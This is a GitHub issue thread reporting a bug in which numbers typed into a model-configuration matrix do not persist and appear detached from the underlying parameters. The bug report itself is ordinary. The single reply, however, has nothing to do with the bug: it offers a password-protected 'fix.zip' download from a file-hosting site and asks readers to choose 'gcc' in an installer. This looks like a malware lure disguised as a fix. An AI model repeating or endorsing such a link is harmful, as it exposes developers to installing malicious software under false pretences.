### ISSUE TITLE
[BUG]: Update through the matrix for model config not persisting

### ISSUE THREAD

**Issue by mwdchang** [DARPA-ASKEM/terarium#4577]
Tenzin mentioned a critical bug Friday: If you open the matrix and try to type in a number, the number does not stick. When you close the matrix the number does reflect the change. But if you open the matrix again and close it, it reverts to the original number.

DC Edit:
The values brought up by the matrix seem to be disassociated from the actual parameter values, for example I am look in at this
<img width="525" alt="image" src="https://github.com/user-attachments/assets/906083f7-32a1-4b4c-afd9-111de83b2a81">

But the b-matrix brought up 

<img width="343" alt="image" src="https://github.com/user-attachments/assets/aeff3b1f-6dff-4452-b55e-8e8eb7d85f6f">

But if I were to edit the matrix cell values it is updating the model's parameter value

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
